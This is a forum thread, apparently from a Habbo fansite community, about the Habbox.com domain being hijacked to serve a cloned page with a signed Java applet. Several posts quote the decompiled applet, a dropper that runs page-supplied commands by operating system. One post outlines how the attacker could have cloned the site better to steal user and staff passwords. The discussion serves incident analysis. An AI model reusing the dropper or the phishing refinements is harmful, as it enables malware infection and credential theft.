Habbox DOT com ~ Site

[Recursion]

I don't have any experience with Java, so it was a guess. From looking at the traffic these processes are using it's an IRC controlled botnet... could be wrong but that's what it seems like to me in my VM.

There is no java exploit. Here is the decompiled code:

Code:

import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
  public void init()
  {
    String window1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();


    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(window1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("lin") < 0) {
      return;
    }
    try
    {
      Process l1 = Runtime.getRuntime().exec(linux1);
      l2 = Runtime.getRuntime().exec(linux2);
    }
    catch (IOException e)
    {
      Process l2;
      e.printStackTrace();
    }
  }
}

Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

[iAdam]

There is no java exploit. Here is the decompiled code:

Code:

import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
  public void init()
  {
    String window1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();


    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(window1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("lin") < 0) {
      return;
    }
    try
    {
      Process l1 = Runtime.getRuntime().exec(linux1);
      l2 = Runtime.getRuntime().exec(linux2);
    }
    catch (IOException e)
    {
      Process l2;
      e.printStackTrace();
    }
  }
}

Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the jist of what Recursion said.

[Tomm]

I'm not arguing. Just was pointing out that there is no Java exploit, which is hardly pedantic. It would be a lot more serious if there was some exploit that bypassed Java's security model. The way it is currently handled is how it is designed - the users needs to give explicit permission for anything bad to happen.

Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the jist of what Recursion said.

[Phil]

whoever it is his name is phil

@Dilusionate; what you been doing to Habbox?

HUH? D:

[Chippiewill]

A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.

I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.

[HotelUser]

There is no java exploit. Here is the decompiled code:

Show Hide

Code:

import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
  public void init()
  {
    String window1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();


    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(window1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("lin") < 0) {
      return;
    }
    try
    {
      Process l1 = Runtime.getRuntime().exec(linux1);
      l2 = Runtime.getRuntime().exec(linux2);
    }
    catch (IOException e)
    {
      Process l2;
      e.printStackTrace();
    }
  }
}

Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.

Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites is also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could of just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could of had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff member's Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whomever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here). I'm also going to confess that leading up to my resignation I spoke to (harassed for hours on end) Matt about talking to Jin in order to get Tom root access to the server. Though not helpful in a circumstance as this one, if (god forbid) a different hacking situation came up, Tom would be here, fully capable, of resolving the issue. Jin agreed to allow Tom such access and I'm not sure if he's still getting it but I believe it would be very beneficial in resolving a hacking situation, or with maintaining server uptime, or with just plain old having it to help him with web development.

Another interesting (sort of clever) security idea which would help in situations like this, would be to include a JavaScript file on each Habbox Domain hosted on a non Habbox website (for instance, since I'm fairly certain all/most Habbox websites use jQuery, and so it would be a good idea to include jQuery hosted on another domain entirely). This way, if the hacker is stupid like this one, when they rip the website it will still link to this third party JavaScript file which a Habbox developer could then simply stick a window.location in and create a *temporary* fix to the problem. This is also a good idea because I've looked at Habbox's Google Analytics before and I've seen and reported (causing them to be shut down), 3 other websites whom all stole interface designs from Habbox. Many thieves are careless and would leave these external JavaScript inclusions intact (especially ones innocent looking like an inclusion to jQuery), so this could be a very useful method of redirecting users back onto Habbox soil where they could read a message in big red letters to not allow the Java code to run.

[jasey]

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

[GommeInc]

B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in

Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology -or demand a whipping seeing as how poorly they've handled the domains :/

This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.

[Recursion]

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.

[Chippiewill]

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.

Now now, you shouldn't criticise code in public.

Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites is also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could of just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could of had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff member's Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whomever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker otherwise they'd be going after higher priority targets who handle card data.

Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here).

I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain apart from rare (And non-existant hopefully after this) events Matt can wait a day or two for Jin to sort stuff.

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I find it hilarious that you kick up a massive fuss when you see a new member of staff breaking a small rule yet Habbox having their domain stolen and destroying user trust is "minor"